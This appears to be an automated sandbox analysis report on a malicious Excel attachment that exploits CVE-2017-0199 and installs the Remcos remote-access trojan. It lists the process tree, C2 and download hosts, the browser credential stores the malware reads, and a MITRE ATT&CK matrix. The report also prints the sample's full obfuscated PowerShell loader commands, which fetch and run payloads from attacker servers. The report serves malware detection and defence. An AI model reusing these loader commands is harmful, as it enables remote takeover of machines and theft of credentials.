                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: logs.dat.31.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433E0A cpuid 34_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,34_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,34_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,34_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,34_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,34_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,34_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,34_2_00450E6A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_00434010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041A7A2 GetUserNameW,34_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,34_2_0044800F
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 34_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 34_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db 34_2_0040B335

                    Remote Access Functionality

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe 34_2_00405042
                    MITRE ATT&CK Matrix

                    Techniques are listed per tactic column. A number in front of a technique is the count shown in the report's matrix for techniques that matched signatures; techniques without a number did not match.

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

                    Resource Development: 121 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

                    Execution: 1 Native API; 23 Exploitation for Client Execution; 131 Command and Scripting Interpreter; 2 Service Execution; 4 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

                    Persistence: 121 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

                    Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 222 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

                    Defense Evasion: 11 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection; Dynamic API Resolution; Stripped Payloads

                    Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

                    Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 35 System Information Discovery; 3 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery

                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools

                    Collection: 11 Archive Collected Data; 1 Email Collection; 211 Input Capture; 4 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

                    Command and Control: 13 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol

                    Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
                    Behavior Graph ID: 1559540, Sample: pi-77159.xls, Start date: 20/11/2024, Architecture: WINDOWS, Score: 100

                    Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 25 other signatures

                    Process tree reconstructed from the behavior graph (each process lists its network contacts, dropped files and signatures as shown in the graph):

                    EXCEL.EXE
                      network: 192.3.220.29 (ports 49164, 49166, 49167; AS-COLOCROSSINGUS, United States); provit.uk 198.244.140.41 (ports 443, 49163, 49165; RIDLEYSD-NETUS, United States)
                      dropped: C:\Users\user\Desktop\pi-77159.xls (copy) (Composite); C:\Users\user\...\~DFC4030D08E8153FBD.TMP (Composite); seethebestthignswh...pportunities[1].hta (HTML)
                      signatures: Microsoft Office drops suspicious files
                      +- mshta.exe
                      |    network: provit.uk
                      |    signatures: Suspicious powershell command line found; PowerShell case anomaly found
                      |    +- powershell.exe
                      |         dropped: seehavingfacingbes...thentiretimegre.vbS (Unicode); C:\Users\user\AppData\...\qvgum1lr.cmdline (Unicode)
                      |         signatures: Suspicious powershell command line found; Obfuscated command line found
                      |         +- wscript.exe
                      |         |    signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
                      |         |    +- powershell.exe
                      |         |         signatures: Suspicious powershell command line found; Obfuscated command line found
                      |         |         +- powershell.exe
                      |         |              network: ip.1017.filemail.com 142.215.209.78 (ports 443, 49168, 49174; HUMBER-COLLEGECA, Canada); 1017.filemail.com
                      |         |              signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                      |         |              +- CasPol.exe
                      |         |                   network: banaya.duckdns.org (Uses dynamic DNS services); banaya.duckdns.org 192.3.101.149 (ports 49176, 6946; AS-COLOCROSSINGUS, United States); geoplugin.net 178.237.33.50 (ports 49177, 80; ATOM86-ASATOM86NL, Netherlands)
                      |         |                   dropped: C:\ProgramData\remcos\logs.dat (data)
                      |         |                   signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures
                      |         +- powershell.exe
                      |         |    signatures: Installs new ROOT certificates
                      |         +- csc.exe
                      |              dropped: C:\Users\user\AppData\Local\...\qvgum1lr.dll (PE32)
                      |              +- cvtres.exe
                      +- mshta.exe
                      |    network: provit.uk
                      |    +- powershell.exe
                      |         +- wscript.exe
                      |         |    +- powershell.exe
                      |         |         +- powershell.exe
                      |         |              network: 1017.filemail.com
                      |         |              +- CasPol.exe
                      |         +- csc.exe
                      |         |    +- cvtres.exe
                      |         +- powershell.exe
                      +- AcroRd32.exe

                    Antivirus detection for the submitted sample
                    Source | Detection | Scanner | Label
                    pi-77159.xls | 26% | ReversingLabs | Win32.Exploit.CVE-2017-0199
                    pi-77159.xls | 100% | Avira | TR/AVI.Agent.xoswb
                    pi-77159.xls | 100% | Joe Sandbox ML |

                    Antivirus detection for dropped files
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\~DFC4030D08E8153FBD.TMP | 100% | Avira | TR/AVI.Agent.xoswb

                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    provit.uk | 198.244.140.41 | true | false | | high
                    banaya.duckdns.org | 192.3.101.149 | true | true | | unknown
                    geoplugin.net | 178.237.33.50 | true | false | | high
                    ip.1017.filemail.com | 142.215.209.78 | true | false | | high
                    1017.filemail.com | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace | false | Avira URL Cloud: safe | unknown
                    http://192.3.220.29/45/HDRDDG.txt | true | Avira URL Cloud: safe | unknown
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF | true | Avira URL Cloud: safe | unknown
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta | true | Avira URL Cloud: safe | unknown
                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f | false | | high
                    http://geoplugin.net/json.gp | false | | high
                    banaya.duckdns.org | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC( | powershell.exe, 00000006.00000002.490776775.000000001A746000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace4 | mshta.exe, 00000004.00000003.453814399.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.00000000003E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX | mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0 | mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaC: | mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://provit.uk/ | mshta.exe, 00000004.00000003.454576074.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455061023.0000000003E70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.dorg/wbem/wsman/1/wsm | wscript.exe, 0000001A.00000003.532582558.000000000016D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.534630974.000000000016E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://1017.filemail.com | powershell.exe, 00000011.00000002.548845698.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
